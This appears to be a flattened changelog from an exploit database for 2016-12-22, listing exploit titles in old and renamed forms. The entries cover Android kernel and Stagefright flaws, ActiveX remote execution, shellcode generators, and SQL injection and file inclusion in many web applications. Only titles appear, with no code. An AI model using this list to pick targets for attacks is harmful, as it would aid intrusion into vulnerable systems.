DB: 2016-12-22
3 new exploits

Android - getpidcon Usage binder Service Replacement Race Condition Google Android - getpidcon Usage binder Service Replacement Race Condition ADODB < 4.70 - (tmssql.php) Denial of Service ADODB < 4.70 - 'tmssql.php' Denial of Service FlashGet 3.x - IEHelper Remote Exec (PoC) FlashGet 3.x - IEHelper Remote Execution (PoC) SopCast SopCore Control ActiveX - Remote Exec (PoC) UUSee ReliPlayer ActiveX - Remote Exec (PoC) SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC) SopCast SopCore Control ActiveX - Remote Execution (PoC) UUSee ReliPlayer ActiveX - Remote Execution (PoC) SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC) Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC) Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC) EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities Android Kernel 2.6 - Local Denial of Service Crash (PoC) Google Android Kernel 2.6 - Local Denial of Service Crash (PoC) IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities IBM solidDB 6.0.10 - Format String / Denial of Service OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow Android - ih264d_process_intra_mb Memory Corruption Google Android - 'ih264d_process_intra_mb' Memory Corruption Android - IOMX getConfig/getParameter Information Disclosure Android - IMemory Native Interface is Insecure for IPC Use Google Android - IOMX getConfig/getParameter Information Disclosure Google Android - IMemory Native Interface is Insecure for IPC Use Android Broadcom Wi-Fi Driver - Memory Corruption Google Android Broadcom Wi-Fi Driver - Memory Corruption Android - /system/bin/sdcard Stack Buffer Overflow Google Android - '/system/bin/sdcard' Stack Buffer Overflow
Android - Insufficient Binder Message Verification Pointer Leak Android - 'gpsOneXtra' Data Files Denial of Service Google Android - Insufficient Binder Message Verification Pointer Leak Google Android - 'gpsOneXtra' Data Files Denial of Service Android - Binder Generic ASLR Leak Google Android - Binder Generic ASLR Leak Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index Google Android - WifiNative::setHotlist Stack Overflow Google Android - WifiNative::setHotlist Stack Overflow Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145) Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144) PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow Android 1.x/2.x - Privilege Escalation Google Android 1.x/2.x - Privilege Escalation Android - 'sensord' Privilege Escalation Google Android - 'sensord' Privilege Escalation tcpdump - ISAKMP Identification payload Integer Overflow tcpdump - ISAKMP Identification Payload Integer Overflow Smail 3.2.0.120 - Heap Overflow Smail 3.2.0.120 - Heap Overflow HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Exploit HP Mercury Quality Center 9.0 build 9.1.0.4352 - SQL Execution Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Motorola Wimax modem CPEi300 - File Disclosure / Cross-Site Scripting navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities navicopa WebServer 3.0.1 - Buffer Overflow / Script Source Disclosure dwebpro 6.8.26 - (Directory Traversal/File Disclosure) Multiple Vulnerabilities dwebpro 6.8.26 - Directory Traversal / File Disclosure citrix xencenterweb - (Cross-Site Scripting / SQL Injection / Remote Code Execution) Multiple Vulnerabilities citrix xencenterweb - Cross-Site Scripting / SQL Injection / Remote Code Execution Adobe GetPlus 
get_atlcom 1.6.2.48 - ActiveX Remote Exec (PoC) Trend Micro Web-Deployment ActiveX - Remote Exec (PoC) Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC) Trend Micro Web-Deployment ActiveX - Remote Execution (PoC) Apache OFBiz - SQL Remote Execution PoC Payload Apache OFBiz - FULLADMIN Creator PoC Payload Apache OFBiz - Remote Execution (via SQL Execution) (PoC) Apache OFBiz - Admin Creator (PoC) Android 2.0 < 2.1 - Reverse Shell Exploit Google Android 2.0 < 2.1 - Reverse Shell Exploit Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit Google Android 2.0/2.1/2.1.1 - WebKit Use-After-Free Exploit Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap Google Android - Inter-Process munmap with User-Controlled Size in android.graphics.Bitmap ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities WinComLPD Total 3.0.2.623 - Buffer Overflow / Authentication Bypass Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow Google Android - libutils UTF16 to UTF8 Conversion Heap Buffer Overflow McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - (ePowner) Multiple Vulnerabilities McAfee ePolicy Orchestrator 4.6.0 < 4.6.5 - 'ePowner' Multiple Vulnerabilities ServletExec - (Directory Traversal / Authentication Bypass) Multiple Vulnerabilities ServletExec - Directory Traversal / Authentication Bypass Android - 'Stagefright' Remote Code Execution Google Android - 'Stagefright' Remote Code Execution Android - libstagefright Integer Overflow Remote Code Execution Google Android - libstagefright Integer Overflow Remote Code Execution Android 2.3.5 - PowerVR SGX Driver Information Disclosure Google Android 2.3.5 - PowerVR SGX Driver 
Information Disclosure Android ADB Debug Server - Remote Payload Execution (Metasploit) Google Android ADB Debug Server - Remote Payload Execution (Metasploit) Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass) Google Android 5.0.1 - Metaphor Stagefright Exploit (ASLR Bypass) Android - 'BadKernel' Remote Code Execution Google Android - 'BadKernel' Remote Code Execution Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) Google Android 5.0 <= 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit) NETGEAR WNR2000v5 - Remote Code Execution Linux/x86 - portbind payload Shellcode (Generator) Windows XP SP1 - portbind payload Shellcode (Generator) Linux/x86 - Portbind Payload Shellcode (Generator) Windows XP SP1 - Portbind Payload Shellcode (Generator) Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes) Google Android - Telnetd (Port 1035) with Parameters Shellcode (248 bytes) phpCOIN 1.2.2 - (phpcoinsessid) SQL Inj / Remote Code Execution phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution Aztek Forum 4.00 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities (PoC) Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection Integramod Portal 2.x - (functions_portal.php) Remote File Inclusion Integramod Portal 2.x - 'functions_portal.php' Remote File Inclusion Integramod Portal 2.0 rc2 - 'phpbb_root_path' Remote File Inclusion Integramod Portal 2.0 rc2 - 'phpbb_root_path' Parameter Remote File Inclusion paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion paBugs 2.0 Beta 3 - 'class.mysql.php' Remote File Inclusion Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion blogme 3.0 - (Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities blogme 3.0 - Cross-Site Scripting / Authentication Bypass torrentflux 2.2 - (Arbitrary File Create/ Execute / Delete) Multiple Vulnerabilities torrentflux 2.2 - 
Arbitrary File Create/ Execute/Delete BBS E-Market Professional - (Full Path Disclosure / File Inclusion) Multiple Vulnerabilities BBS E-Market Professional - Full Path Disclosure / File Inclusion myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Remote File Inclusion myPHPNuke Module My_eGallery 2.5.6 - 'basepath' Parameter Remote File Inclusion ig shop 1.0 - (Code Execution / SQL Injection) Multiple Vulnerabilities ig shop 1.0 - Code Execution / SQL Injection QUOTE&ORDERING SYSTEM 1.0 - (ordernum) Multiple Vulnerabilities QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities vp-asp shopping cart 6.09 - SQL Injection / Cross-Site Scripting forum livre 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities forum livre 1.0 - SQL Injection / Cross-Site Scripting otscms 2.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities otscms 2.1.5 - SQL Injection / Cross-Site Scripting Connectix Boards 0.7 - (p_skin) Multiple Vulnerabilities Connectix Boards 0.7 - 'p_skin' Multiple Vulnerabilities wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities wbblog - Cross-Site Scripting / SQL Injection PHP-Nuke Module Eve-Nuke 0.1 - (mysql.php) Remote File Inclusion PHP-Nuke Module Eve-Nuke 0.1 - 'mysql.php' Remote File Inclusion Quick and Dirty Blog (qdblog) 0.4 - (SQL Injection / Local File Inclusion) Multiple Vulnerabilities Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion PHP Coupon Script 3.0 - (index.php bus) SQL Injection PHP Coupon Script 3.0 - 'bus' Parameter SQL Injection runawaysoft haber portal 1.0 - (tr) Multiple Vulnerabilities runawaysoft haber portal 1.0 - 'tr' Multiple Vulnerabilities NetClassifieds - (SQL Injection / Cross-Site Scripting / Full Path) Multiple Vulnerabilities NetClassifieds - SQL Injection / Cross-Site Scripting / Full Path bugmall shopping cart 2.5 - (SQL Injection / Cross-Site 
Scripting) Multiple Vulnerabilities bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting PHPVID 0.9.9 - (categories_type.php cat) SQL Injection PHPVID 0.9.9 - 'categories_type.php' SQL Injection bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities bcoos 1.0.10 - Local File Inclusion / SQL Injection ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities netrisk 1.9.7 - Cross-Site Scripting / SQL Injection EasyClassifields 3.0 - (go) SQL Injection CMSbright - (id_rub_page) SQL Injection EasyClassifields 3.0 - 'go' Parameter SQL Injection CMSbright - 'id_rub_page' Parameter SQL Injection myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection Coupon Script 4.0 - 'id' SQL Injection Reciprocal Links Manager 1.1 - (site) SQL Injection myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection Coupon Script 4.0 - 'id' Parameter SQL Injection Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection Spice Classifieds - (cat_path) SQL Injection CS-Cart 1.3.5 - Authentication Bypass Spice Classifieds - 'cat_path' Parameter SQL Injection aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities aspwebalbum 3.2 - Arbitrary File Upload / SQL 
Injection / Cross-Site Scripting Living Local Website - 'listtest.php r' SQL Injection ACG-PTP 1.0.6 - 'adid' SQL Injection qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ACG-ScriptShop - 'cid' SQL Injection AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution Living Local Website - 'listtest.php' SQL Injection ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection qwicsite pro - SQL Injection / Cross-Site Scripting ACG-ScriptShop - 'cid' Parameter SQL Injection AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution Vastal I-Tech Agent Zone - (ann_id) SQL Injection Vastal I-Tech Visa Zone - (news_id) SQL Injection Vastal I-Tech Toner Cart - 'id' SQL Injection Vastal I-Tech Share Zone - 'id' SQL Injection Vastal I-Tech DVD Zone - 'cat_id' SQL Injection Vastal I-Tech Jobs Zone - (news_id) SQL Injection Vastal I-Tech MMORPG Zone - (game_id) SQL Injection Vastal I-Tech Mag Zone - 'cat_id' SQL Injection Vastal I-Tech Freelance Zone - (coder_id) SQL Injection Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection EsFaq 2.0 - (idcat) SQL Injection Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection Vastal I-Tech Dating Zone - (fage) SQL Injection Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection Vastal I-Tech Share Zone - 'id' Parameter SQL Injection Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection EsFaq 2.0 - 'idcat' Parameter SQL Injection Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection Masir Camp E-Shop Module 
3.0 - (ordercode) SQL Injection Alstrasoft Forum - (cat) SQL Injection Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection Alstrasoft Forum - 'cat' Parameter SQL Injection Alstrasoft Forum - 'catid' SQL Injection Alstrasoft Forum - 'catid' Parameter SQL Injection Creator CMS 5.0 - (sideid) SQL Injection Creator CMS 5.0 - 'sideid' Parameter SQL Injection CMS Buzz - 'id' SQL Injection CMS Buzz - 'id' Parameter SQL Injection phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities Autodealers CMS AutOnline - (pageid) SQL Injection Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion PHPVID 1.1 - Cross-Site Scripting / SQL Injection Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion Autodealers CMS AutOnline - 'id' SQL Injection Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection PhpWebGallery 1.3.4 - (cat) Blind SQL Injection Autodealers CMS AutOnline - 'id' Parameter SQL Injection Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection PhpWebGallery 1.3.4 - Blind SQL Injection phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities phpsmartcom 0.2 - Local File Inclusion / SQL Injection AvailScript Article Script - 'view.php v' SQL Injection AvailScript Article Script - 'view.php' SQL Injection Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection mini-pub 0.3 - (File Disclosure/Code Execution) Multiple Vulnerabilities mini-pub 0.3 - File Disclosure / Code Execution websvn 2.0 - (Cross-Site Scripting / File Handling/Code Execution) Multiple Vulnerabilities 
websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution phpdaily - (SQL Injection / Cross-Site Scripting / lfd) Multiple Vulnerabilities phpdaily - SQL Injection / Cross-Site Scripting / Local File Download questcms - (Cross-Site Scripting / Directory Traversal / SQL Injection) Multiple Vulnerabilities questcms - Cross-Site Scripting / Directory Traversal / SQL Injection MatPo Link 1.2b - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting WEBBDOMAIN WebShop 1.02 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting Prozilla Software Directory - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Prozilla Software Directory - Cross-Site Scripting / SQL Injection TurnkeyForms Local Classifieds - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection zeeproperty 1.0 - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting Openfire Server 3.6.0a - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities Collabtive 0.4.8 - (Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload) Multiple Vulnerabilities Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload MODx CMS 0.9.6.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting ftpzik - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities bandwebsite 1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ftpzik - Cross-Site Scripting / Local File Inclusion bandwebsite 1.5 - SQL Injection / Cross-Site Scripting 
nitrotech 0.0.3a - (Remote File Inclusion / SQL Injection) Multiple Vulnerabilities nitrotech 0.0.3a - Remote File Inclusion / SQL Injection chipmunk topsites - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities Clean CMS 1.5 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities chipmunk topsites - Authentication Bypass / Cross-Site Scripting Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure comersus asp shopping cart - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting minimal ablog 0.4 - (SQL Injection / Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass wbstreet 1.0 - (SQL Injection / File Disclosure) Multiple Vulnerabilities wbstreet 1.0 - SQL Injection / File Disclosure template creature - (SQL Injection / File Disclosure) Multiple Vulnerabilities template creature - SQL Injection / File Disclosure merlix educate servert - (Authentication Bypass/File Disclosure) Multiple Vulnerabilities merlix educate servert - Authentication Bypass / File Disclosure nightfall personal diary 1.0 - (Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure ASP AutoDealer - (SQL Injection / File Disclosure) Multiple Vulnerabilities ASP AutoDealer - SQL Injection / File Disclosure aspmanage banners - (Arbitrary File Upload / File Disclosure) Multiple Vulnerabilities aspmanage banners - Arbitrary File Upload / File Disclosure asp talk - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities asp talk - SQL Injection / Cross-Site Scripting webcaf 1.4 - (Local File Inclusion / 
Remote Code Execution) Multiple Vulnerabilities webcaf 1.4 - Local File Inclusion / Remote Code Execution PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities postecards - SQL Injection / File Disclosure PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities cf shopkart 5.2.2 - SQL Injection / File Disclosure the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities the net guys aspired2blog - SQL Injection / File Disclosure Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities Joomla! 
Component live chat - SQL Injection / Open Proxy Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities isweb CMS 3.0 - SQL Injection / Cross-Site Scripting clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities clickandemail - SQL Injection / Cross-Site Scripting Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities ezpack 4.2b2 - Cross-Site Scripting / SQL Injection Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities 
Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities rankem - File Disclosure / Cross-Site Scripting / Cookie blogit! - SQL Injection / File Disclosure / Cross-Site Scripting gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities revou twitter clone - Cross-Site Scripting / SQL Injection bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting Android 'content://' URI - Multiple Information Disclosure Vulnerabilities Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting team 1.x - File Disclosure / Cross-Site Scripting gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution AdaptCMS Lite 1.4 - 
(Cross-Site Scripting / Remote File Inclusion) Multiple Vulnerabilities SnippetMaster Webpage Editor 2.2.2 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting dacio's CMS 1.08 - (Cross-Site Scripting / SQL Injection / File Disclosure) Multiple Vulnerabilities dacio's CMS 1.08 - Cross-Site Scripting / SQL Injection / File Disclosure ideacart 0.02 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities ideacart 0.02 - Local File Inclusion / SQL Injection CmsFaethon 2.2.0 - (info.php item) SQL Command Injection CmsFaethon 2.2.0 - info.php item SQL Command Injection powermovielist 0.14b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities powermovielist 0.14b - SQL Injection / Cross-Site Scripting Graugon Forum 1 - 'id' SQL Command Injection Graugon Forum 1 - 'id' Command Injection (via SQL Injection) irokez blog 0.7.3.2 - (Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection) Multiple Vulnerabilities irokez blog 0.7.3.2 - Cross-Site Scripting / Remote File Inclusion / Blind SQL Injection ritsblog 0.4.2 - (Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting blindblog 1.3.1 - (SQL Injection / Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities tghostscripter Amazon Shop - (Cross-Site Scripting / Directory Traversal / Remote File Inclusion) Multiple Vulnerabilities blindblog 1.3.1 - SQL Injection / Authentication Bypass / Local File Inclusion tghostscripter Amazon Shop - Cross-Site Scripting / Directory Traversal / Remote File Inclusion Wili-CMS 0.4.0 - (Remote File Inclusion / Local File Inclusion / Authentication Bypass) Multiple Vulnerabilities Wili-CMS 0.4.0 - Remote File Inclusion / Local File Inclusion / Authentication Bypass PHP Director 0.21 - (sql into outfile) 
eval() Injection PHP Director 0.21 - (SQL into outfile) eval() Injection phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities phpCommunity 2.1.8 - SQL Injection / Directory Traversal / Cross-Site Scripting phpmysport 1.4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities phpmysport 1.4 - Cross-Site Scripting / SQL Injection Kim Websites 1.0 - (Authentication Bypass) SQL Injection Kim Websites 1.0 - Authentication Bypass Bloginator 1a - (Cookie Bypass / SQL Injection) Multiple Vulnerabilities Bloginator 1a - Cookie Bypass / SQL Injection Pixie CMS - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities Pixie CMS - Cross-Site Scripting / SQL Injection Codice CMS 2 - SQL Command Execution Syzygy CMS 0.3 - Local File Inclusion / SQL Command Injection Codice CMS 2 - Command Execution (via SQL Injection) Syzygy CMS 0.3 - Local File Inclusion / SQL Injection acute control panel 1.0.0 - (SQL Injection / Remote File Inclusion) Multiple Vulnerabilities acute control panel 1.0.0 - SQL Injection / Remote File Inclusion Diskos CMS Manager - (SQL Injection / File Disclosure/Authentication Bypass) Multiple Vulnerabilities Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass ablespace 1.0 - (Cross-Site Scripting / Blind SQL Injection) Multiple Vulnerabilities PHP-revista 1.1.2 - (Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting) Multiple Vulnerabilities ablespace 1.0 - Cross-Site Scripting / Blind SQL Injection PHP-revista 1.1.2 - Remote File Inclusion / SQL Injection / Authentication Bypass / Cross-Site Scripting flatnux 2009-03-27 - (Arbitrary File Upload / Information Disclosure) Multiple Vulnerabilities flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure fungamez rc1 - (Authentication Bypass / Local File Inclusion) Multiple Vulnerabilities fungamez rc1 - Authentication Bypass / Local File Inclusion pastelcms 0.8.0 - (Local 
